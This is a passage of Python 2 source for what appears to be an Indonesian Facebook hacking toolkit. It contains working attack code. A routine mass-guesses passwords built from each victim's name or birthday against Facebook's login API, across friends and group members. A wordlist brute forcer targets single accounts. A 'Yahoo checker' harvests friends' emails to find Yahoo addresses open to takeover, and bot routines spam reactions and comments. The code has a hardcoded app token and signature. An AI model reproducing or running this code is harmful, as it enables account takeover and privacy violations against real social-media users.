re=requests.get('https://graph.facebook.com/'+idg+'/members?fields=name,id&limit=999999999&access_token='+toket)
s=json.loads(re.text)
for p in s['data']:
id.append(p['id'])
elif peak =="0":
menu_hack()
else:
print "\033[1;91m[!] Wrong input"
pilih_super()
print "\033[1;91m[+] \033[1;92mTotal ID \033[1;91m: \033[1;97m"+str(len(id))
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[1;91m[\033[1;96m✸\033[1;91m] \033[1;92mCrack \033[1;97m"+o),;sys.stdout.flush();time.sleep(1)
print
print 42*"\033[1;97m═"
##### crack #####
def main(arg):
global cekpoint,oks
user = arg
try:
os.mkdir('out')
except OSError:
pass
try:
#Pass1
a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)
b = json.loads(a.text)
pass1 = b['first_name']+'123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass1)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
z = json.loads(x.text)
print("\033[1;93m[ \033[1;93mOK✓\033[1;93m ] "+user+" 😁 " +pass1+" =>"+z['name'])
oks.append(user+pass1)
else:
if 'www.facebook.com' in q["error_msg"]:
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass1+"\n")
cek.close()
cekpoint.append(user+pass1)
else:
#Pass2
pass2 = b['first_name']+'12345'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass2)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
z = json.loads(x.text)
print("\033[1;93m[ \033[1;93mOK✓\033[1;93m ] "+user+" 😁 " +pass2+" =>"+z['name'])
oks.append(user+pass2)
else:
if 'www.facebook.com' in q["error_msg"]:
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass2+"\n")
cek.close()
cekpoint.append(user+pass2)
else:
#Pass3
pass3 = b['last_name'] + '123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass3)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
z = json.loads(x.text)
print("\033[1;93m[ \033[1;93mOK✓\033[1;93m ] "+user+" 😁 " +pass3+" =>"+z['name'])
oks.append(user+pass3)
else:
if 'www.facebook.com' in q["error_msg"]:
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass3+"\n")
cek.close()
cekpoint.append(user+pass3)
else:
#Pass4
lahir = b['birthday']
pass4 = lahir.replace('/', '')
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass4)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
z = json.loads(x.text)
print("\033[1;93m[ \033[1;93mOK✓\033[1;93m ] "+user+" 😁 " +pass4+" =>"+z['name'])
oks.append(user+pass4)
else:
if 'www.facebook.com' in q["error_msg"]:
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass4+"\n")
cek.close()
cekpoint.append(user+pass4)
else:
#Pass5
pass5 = "sayang123"
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass5)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
z = json.loads(x.text)
print("\033[1;93m[ \033[1;93mOK✓\033[1;93m ] "+user+" 😁 " +pass5+" =>"+z['name'])
oks.append(user+pass5)
else:
if 'www.facebook.com' in q["error_msg"]:
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass5+"\n")
cek.close()
cekpoint.append(user+pass5)
else:
#Pass6
pass6 = "kontol123"
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass6)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
z = json.loads(x.text)
print("\033[1;93m[ \033[1;93mOK✓\033[1;93m ] "+user+" 😁 " +pass6+" =>"+z['name'])
oks.append(user+pass6)
else:
if 'www.facebook.com' in q["error_msg"]:
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass6+"\n")
cek.close()
cekpoint.append(user+pass6)
else:
#Pass7
a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)
b = json.loads(a.text)
pass7 = b['first_name']+'doraemon321'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass7)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
z = json.loads(x.text)
print("\033[1;93m[ \033[1;93mOK✓\033[1;93m ] "+user+" 😁 " +pass7+" =>"+z['name'])
oks.append(user+pass7)
else:
if 'www.facebook.com' in q["error_msg"]:
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass7+"\n")
cek.close()
cekpoint.append(user+pass7)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print 42*"\033[1;97m═"
print '\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mDone \033[1;97m....'
print"\033[1;91m[+] \033[1;92mTotal OK/CP \033[1;91m: \033[1;92m"+str(len(oks))+"\033[1;97m/\033[1;93m"+str(len(cekpoint))
print("\033[1;91m[+] \033[1;92mCP File saved \033[1;91m: \033[1;97mout/super_cp.txt")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
super()
######################################################
##### BRUTE FORCE #####
def brute():
global toket
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
try:
email = raw_input("\033[1;91m[+] \033[1;92mID\033[1;97m/\033[1;92mEmail\033[1;97m/\033[1;92mHp \033[1;97mTarget \033[1;91m:\033[1;97m ")
passw = raw_input("\033[1;91m[+] \033[1;92mWordlist \033[1;97mext(list.txt) \033[1;91m: \033[1;97m")
total = open(passw,"r")
total = total.readlines()
print 42*"\033[1;97m═"
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mTarget \033[1;91m:\033[1;97m "+email
print "\033[1;91m[+] \033[1;92mTotal\033[1;96m "+str(len(total))+" \033[1;92mPassword"
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
sandi = open(passw,"r")
for pw in sandi:
try:
pw = pw.replace("\n","")
sys.stdout.write("\r\033[1;91m[\033[1;96m✸\033[1;91m] \033[1;92mCrack \033[1;91m: \033[1;97m"+pw)
sys.stdout.flush()
data = requests.get("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(email)+"&locale=en_US&password="+(pw)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
mpsh = json.loads(data.text)
if 'access_token' in mpsh:
dapat = open("Brute.txt", "w")
dapat.write(email+" | "+pw+"\n")
dapat.close()
print "\n\033[1;91m[+] \033[1;92mFound"
print 42*"\033[1;97m═"
print("\033[1;91m[➹] \033[1;92mUsername \033[1;91m:\033[1;97m "+email)
print("\033[1;91m[➹] \033[1;92mPassword \033[1;91m:\033[1;97m "+pw)
keluar()
elif 'www.facebook.com' in mpsh["error_msg"]:
ceks = open("Brutecekpoint.txt", "w")
ceks.write(email+" | "+pw+"\n")
ceks.close()
print "\n\033[1;91m[+] \033[1;92mFound"
print 42*"\033[1;97m═"
print "\033[1;91m[!] \033[1;93mAccount Checkpoint"
print("\033[1;91m[➹] \033[1;92mUsername \033[1;91m:\033[1;97m "+email)
print("\033[1;91m[➹] \033[1;92mPassword \033[1;91m:\033[1;97m "+pw)
keluar()
except requests.exceptions.ConnectionError:
print"\033[1;91m[!] Connection Error"
time.sleep(1)
except IOError:
print ("\033[1;91m[!] File not found")
tanyaw()
def tanyaw():
why = raw_input("\033[1;91m[?] \033[1;92mCreate wordlist ? \033[1;92m[y/n]\033[1;91m:\033[1;97m ")
if why =="":
print "\033[1;91m[!] Wrong"
tanyaw()
elif why =="y":
wordlist()
elif why =="Y":
wordlist()
elif why =="n":
menu_hack()
elif why =="N":
menu_hack()
else:
print "\033[1;91m[!] Wrong"
tanyaw()
##### YAHOO CHECKER #####
#---------------------------------------------------#
def menu_yahoo():
global toket
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print "\033[1;97m║--\033[1;91m> \033[1;92m1.\033[1;97m With list friend"
print "\033[1;97m║--\033[1;91m> \033[1;92m2.\033[1;97m Clone from friend"
print "\033[1;97m║--\033[1;91m> \033[1;92m3.\033[1;97m Clone from member group"
print "\033[1;97m║--\033[1;91m> \033[1;92m4.\033[1;97m Using file"
print "\033[1;97m║--\033[1;91m> \033[1;91m0.\033[1;97m Back"
print "║"
yahoo_pilih()
#----pilih
def yahoo_pilih():
go = raw_input("\033[1;97m╚═\033[1;91mD \033[1;97m")
if go =="":
print "\033[1;91m[!] Wrong"
yahoo_pilih()
elif go =="1":
yahoofriends()
elif go =="2":
yahoofromfriends()
elif go =="3":
yahoomember()
elif go =="4":
yahoolist()
elif go =="0":
menu_hack()
else:
print "\033[1;91m[!] Wrong"
yahoo_pilih()
##### LIST FRIEND #####
def yahoofriends():
global toket
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
os.system('reset')
print logo
mpsh = []
jml = 0
jalan('\033[1;91m[✺] \033[1;92mGetting email friend \033[1;97m...')
teman = requests.get('https://graph.facebook.com/me/friends?access_token='+toket)
kimak = json.loads(teman.text)
save = open('out/MailVuln.txt','w')
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
print 42*"\033[1;97m═"
for w in kimak['data']:
jml +=1
mpsh.append(jml)
id = w['id']
nama = w['name']
links = requests.get("https://graph.facebook.com/"+id+"?access_token="+toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile(r'@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com")
br._factory.is_html = True
br.select_form(nr=0)
br["username"] = mail
klik = br.submit().read()
jok = re.compile(r'"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print("\033[1;97m[ \033[1;92mVULN✓\033[1;97m ] \033[1;92m" +mail+" \033[1;97m=>"+nama)
berhasil.append(mail)
except KeyError:
pass
print 42*"\033[1;97m═"
print '\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mDone \033[1;97m....'
print"\033[1;91m[+] \033[1;92mTotal \033[1;91m: \033[1;97m"+str(len(berhasil))
print"\033[1;91m[+] \033[1;92mFile saved \033[1;91m:\033[1;97m out/MailVuln.txt"
save.close()
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_yahoo()
##### CLONE FROM FRIEND #####
def yahoofromfriends():
global toket
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
os.system('reset')
print logo
mpsh = []
jml = 0
idt = raw_input("\033[1;91m[+] \033[1;92mInput ID friend \033[1;91m: \033[1;97m")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom\033[1;91m :\033[1;97m "+op["name"]
except KeyError:
print"\033[1;91m[!] Friend not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_yahoo()
jalan('\033[1;91m[✺] \033[1;92mGetting email from friend \033[1;97m...')
teman = requests.get('https://graph.facebook.com/'+idt+'/friends?access_token='+toket)
kimak = json.loads(teman.text)
save = open('out/FriendMailVuln.txt','w')
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
print 42*"\033[1;97m═"
for w in kimak['data']:
jml +=1
mpsh.append(jml)
id = w['id']
nama = w['name']
links = requests.get("https://graph.facebook.com/"+id+"?access_token="+toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile(r'@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com")
br._factory.is_html = True
br.select_form(nr=0)
br["username"] = mail
klik = br.submit().read()
jok = re.compile(r'"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print("\033[1;97m[ \033[1;92mVULN✓\033[1;97m ] \033[1;92m" +mail+" \033[1;97m=>"+nama)
berhasil.append(mail)
except KeyError:
pass
print 42*"\033[1;97m═"
print '\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mDone \033[1;97m....'
print"\033[1;91m[+] \033[1;92mTotal \033[1;91m: \033[1;97m"+str(len(berhasil))
print"\033[1;91m[+] \033[1;92mFile saved \033[1;91m:\033[1;97m out/FriendMailVuln.txt"
save.close()
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_yahoo()
##### YAHOO MEMBER #####
def yahoomember():
global toket
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
os.system('reset')
print logo
mpsh = []
jml = 0
id=raw_input('\033[1;91m[+] \033[1;92mInput ID group \033[1;91m:\033[1;97m ')
try:
r=requests.get('https://graph.facebook.com/group/?id='+id+'&access_token='+toket)
asw=json.loads(r.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom group \033[1;91m:\033[1;97m "+asw['name']
except KeyError:
print"\033[1;91m[!] Group not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_yahoo()
jalan('\033[1;91m[✺] \033[1;92mGetting email from group \033[1;97m...')
teman = requests.get('https://graph.facebook.com/'+id+'/members?fields=name,id&limit=999999999&access_token='+toket)
kimak = json.loads(teman.text)
save = open('out/GrupMailVuln.txt','w')
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
print 42*"\033[1;97m═"
for w in kimak['data']:
jml +=1
mpsh.append(jml)
id = w['id']
nama = w['name']
links = requests.get("https://graph.facebook.com/"+id+"?access_token="+toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile(r'@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com")
br._factory.is_html = True
br.select_form(nr=0)
br["username"] = mail
klik = br.submit().read()
jok = re.compile(r'"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print("\033[1;97m[ \033[1;92mVULN✓\033[1;97m ] \033[1;92m" +mail+" \033[1;97m=>"+nama)
berhasil.append(mail)
except KeyError:
pass
print 42*"\033[1;97m═"
print '\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mDone \033[1;97m....'
print"\033[1;91m[+] \033[1;92mTotal \033[1;91m: \033[1;97m"+str(len(berhasil))
print"\033[1;91m[+] \033[1;92mFile saved \033[1;91m:\033[1;97m out/GrupMailVuln.txt"
save.close()
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_yahoo()
##### YAHOO FILE #####
def yahoolist():
global toket
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
os.system('reset')
print logo
files = raw_input("\033[1;91m[+] \033[1;92mFile path \033[1;91m: \033[1;97m")
try:
total = open(files,"r")
mail = total.readlines()
except IOError:
print"\033[1;91m[!] File not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_yahoo()
mpsh = []
jml = 0
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
save = open('out/FileMailVuln.txt','w')
print 42*"\033[1;97m═"
mail = open(files,"r").readlines()
for pw in mail:
mail = pw.replace("\n","")
jml +=1
mpsh.append(jml)
yahoo = re.compile(r'@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com")
br._factory.is_html = True
br.select_form(nr=0)
br["username"] = mail
klik = br.submit().read()
jok = re.compile(r'"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print("\033[1;97m[ \033[1;92mVULN✓\033[1;97m ] \033[1;92m" +mail)
berhasil.append(mail)
print 42*"\033[1;97m═"
print '\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mDone \033[1;97m....'
print"\033[1;91m[+] \033[1;92mTotal \033[1;91m: \033[1;97m"+str(len(berhasil))
print"\033[1;91m[+] \033[1;92mFile saved \033[1;91m:\033[1;97m out/FileMailVuln.txt"
save.close()
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_yahoo()
##### MENU BOT #####
#----------------------------------------#
def menu_bot():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print "\033[1;97m║--\033[1;91m> \033[1;92m1.\033[1;97m Bot Reactions Target Post"
print "\033[1;97m║--\033[1;91m> \033[1;92m2.\033[1;97m Bot Reactions Grup Post"
print "\033[1;97m║--\033[1;91m> \033[1;92m3.\033[1;97m Bot Komen Target Post"
print "\033[1;97m║--\033[1;91m> \033[1;92m4.\033[1;97m Bot Komen Grup Post"
print "\033[1;97m║--\033[1;91m> \033[1;92m5.\033[1;97m Mass delete Post"
print "\033[1;97m║--\033[1;91m> \033[1;92m6.\033[1;97m Mass accept friend"
print "\033[1;97m║--\033[1;91m> \033[1;92m7.\033[1;97m Mass delete friend"
print "\033[1;97m║--\033[1;91m> \033[1;91m0.\033[1;97m Back"
print "║"
bot_pilih()
#////////////
def bot_pilih():
bots = raw_input("\033[1;97m╚═\033[1;91mD \033[1;97m")
if bots =="":
print "\033[1;91m[!] Wrong input"
bot_pilih()
elif bots =="1":
menu_react()
elif bots =="2":
grup_react()
elif bots =="3":
bot_komen()
elif bots =="4":
grup_komen()
elif bots =="5":
deletepost()
elif bots =="6":
accept()
elif bots =="7":
unfriend()
elif bots =="0":
menu()
else:
print "\033[1;91m[!] Wrong input"
bot_pilih()
##### MENU REACT #####
def menu_react():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print ("\033[1;97m║--\033[1;91m> \033[1;92m1. \033[1;97mLike")
print ("\033[1;97m║--\033[1;91m> \033[1;92m2. \033[1;97mLove")
print ("\033[1;97m║--\033[1;91m> \033[1;92m3. \033[1;97mWow")
print ("\033[1;97m║--\033[1;91m> \033[1;92m4. \033[1;97mHaha")
print ("\033[1;97m║--\033[1;91m> \033[1;92m5. \033[1;97mSadBoy")
print ("\033[1;97m║--\033[1;91m> \033[1;92m6. \033[1;97mAngry")
print "\033[1;97m║--\033[1;91m> \033[1;91m0.\033[1;97m Back"
print "║"
react_pilih()
#//////////////
def react_pilih():
global tipe
aksi = raw_input("\033[1;97m╚═\033[1;91mD \033[1;97m")
if aksi =="":
print "\033[1;91m[!] Wrong input"
react_pilih()
elif aksi =="1":
tipe = "LIKE"
react()
elif aksi =="2":
tipe = "LOVE"
react()
elif aksi =="3":
tipe = "WOW"
react()
elif aksi =="4":
tipe = "HAHA"
react()
elif aksi =="5":
tipe = "SAD"
react()
elif aksi =="6":
tipe = "ANGRY"
react()
elif aksi =="0":
menu_bot()
else:
print "\033[1;91m[!] Wrong input"
react_pilih()
#####NEXT
def react():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
ide = raw_input('\033[1;91m[+] \033[1;92mInput ID Target \033[1;91m:\033[1;97m ')
limit = raw_input("\033[1;91m[!] \033[1;92mLimit \033[1;91m:\033[1;97m ")
try:
oh = requests.get("https://graph.facebook.com/"+ide+"?fields=feed.limit("+limit+")&access_token="+toket)
ah = json.loads(oh.text)
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
print 42*"\033[1;97m═"
for a in ah['feed']['data']:
y = a['id']
reaksi.append(y)
requests.post("https://graph.facebook.com/"+y+"/reactions?type="+tipe+"&access_token="+toket)
print '\033[1;92m[\033[1;97m'+y[:10].replace('\n',' ')+'... \033[1;92m] \033[1;97m'+tipe
print 42*"\033[1;97m═"
print "\r\033[1;91m[+]\033[1;92m Done \033[1;97m"+str(len(reaksi))
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
except KeyError:
print"\033[1;91m[!] ID not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
##### BOT REACT GRUP #####
def grup_react():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print ("\033[1;97m║--\033[1;91m> \033[1;92m1. \033[1;97mLike")
print ("\033[1;97m║--\033[1;91m> \033[1;92m2. \033[1;97mLove")
print ("\033[1;97m║--\033[1;91m> \033[1;92m3. \033[1;97mWow")
print ("\033[1;97m║--\033[1;91m> \033[1;92m4. \033[1;97mHaha")
print ("\033[1;97m║--\033[1;91m> \033[1;92m5. \033[1;97mSadBoy")
print ("\033[1;97m║--\033[1;91m> \033[1;92m6. \033[1;97mAngry")
print "\033[1;97m║--\033[1;91m> \033[1;91m0.\033[1;97m Back"
print "║"
reactg_pilih()
#//////////////
def reactg_pilih():
global tipe
aksi = raw_input("\033[1;97m╚═\033[1;91mD \033[1;97m")
if aksi =="":
print "\033[1;91m[!] Wrong input"
reactg_pilih()
elif aksi =="1":
tipe = "LIKE"
reactg()
elif aksi =="2":
tipe = "LOVE"
reactg()
elif aksi =="3":
tipe = "WOW"
reactg()
elif aksi =="4":
tipe = "HAHA"
reactg()
elif aksi =="5":
tipe = "SAD"
reactg()
elif aksi =="6":
tipe = "ANGRY"
reactg()
elif aksi =="0":
menu_bot()
else:
print "\033[1;91m[!] Wrong input"
reactg_pilih()
#####NEXT
def reactg():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
ide = raw_input('\033[1;91m[+] \033[1;92mInput ID Group \033[1;91m:\033[1;97m ')
limit = raw_input("\033[1;91m[!] \033[1;92mLimit \033[1;91m:\033[1;97m ")
try:
r=requests.get('https://graph.facebook.com/group/?id='+ide+'&access_token='+toket)
asw=json.loads(r.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom group \033[1;91m:\033[1;97m "+asw['name']
except KeyError:
print"\033[1;91m[!] Group not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
grup_react()
try:
oh = requests.get("https://graph.facebook.com/v3.0/"+ide+"?fields=feed.limit("+limit+")&access_token="+toket)
ah = json.loads(oh.text)
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
print 42*"\033[1;97m═"
for a in ah['feed']['data']:
y = a['id']
reaksigrup.append(y)
requests.post("https://graph.facebook.com/"+y+"/reactions?type="+tipe+"&access_token="+toket)
print '\033[1;92m[\033[1;97m'+y[:10].replace('\n',' ')+'... \033[1;92m] \033[1;97m'+tipe
print 42*"\033[1;97m═"
print "\r\033[1;91m[+]\033[1;92m Done \033[1;97m"+str(len(reaksigrup))
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
except KeyError:
print"\033[1;91m[!] ID not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
##### BOT KOMEN #####
def bot_komen():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print "\033[1;91m[!] \033[1;92mUse \033[1;97m'<>' \033[1;92mfor new lines"
ide = raw_input('\033[1;91m[+] \033[1;92mID Target \033[1;91m:\033[1;97m ')
km = raw_input('\033[1;91m[+] \033[1;92mComment \033[1;91m:\033[1;97m ')
limit = raw_input("\033[1;91m[!] \033[1;92mLimit \033[1;91m:\033[1;97m ")
km=km.replace('<>','\n')
try:
p = requests.get("https://graph.facebook.com/"+ide+"?fields=feed.limit("+limit+")&access_token="+toket)
a = json.loads(p.text)
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
print 42*"\033[1;97m═"
for s in a['feed']['data']:
f = s['id']
komen.append(f)
requests.post("https://graph.facebook.com/"+f+"/comments?message="+km+"&access_token="+toket)
print '\033[1;92m[\033[1;97m'+km[:10].replace('\n',' ')+'... \033[1;92m]'
print 42*"\033[1;97m═"
print "\r\033[1;91m[+]\033[1;92m Done \033[1;97m"+str(len(komen))
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
except KeyError:
print"\033[1;91m[!] ID not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
##### BOT KOMEN GRUP #####
def grup_komen():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print "\033[1;91m[!] \033[1;92mUse \033[1;97m'<>' \033[1;92mfor new lines"
ide = raw_input('\033[1;91m[+] \033[1;92mID Group \033[1;91m:\033[1;97m ')
km = raw_input('\033[1;91m[+] \033[1;92mComment \033[1;91m:\033[1;97m ')
limit = raw_input("\033[1;91m[!] \033[1;92mLimit \033[1;91m:\033[1;97m ")
km=km.replace('<>','\n')
try:
r=requests.get('https://graph.facebook.com/group/?id='+ide+'&access_token='+toket)
asw=json.loads(r.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom group \033[1;91m:\033[1;97m "+asw['name']
except KeyError:
print"\033[1;91m[!] Group not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
try:
p = requests.get("https://graph.facebook.com/v3.0/"+ide+"?fields=feed.limit("+limit+")&access_token="+toket)
a = json.loads(p.text)
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
print 42*"\033[1;97m═"
for s in a['feed']['data']:
f = s['id']
komengrup.append(f)
requests.post("https://graph.facebook.com/"+f+"/comments?message="+km+"&access_token="+toket)
print '\033[1;92m[\033[1;97m'+km[:10].replace('\n',' ')+'... \033[1;92m]'
print 42*"\033[1;97m═"
print "\r\033[1;91m[+]\033[1;92m Done \033[1;97m"+str(len(komengrup))
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
except KeyError:
print"\033[1;91m[!] Error"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
##### HAPUS POST #####
def deletepost():
os.system('reset')
try:
toket=open('login.txt','r').read()
nam = requests.get('https://graph.facebook.com/me?access_token='+toket)
lol = json.loads(nam.text)
nama = lol['name']
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
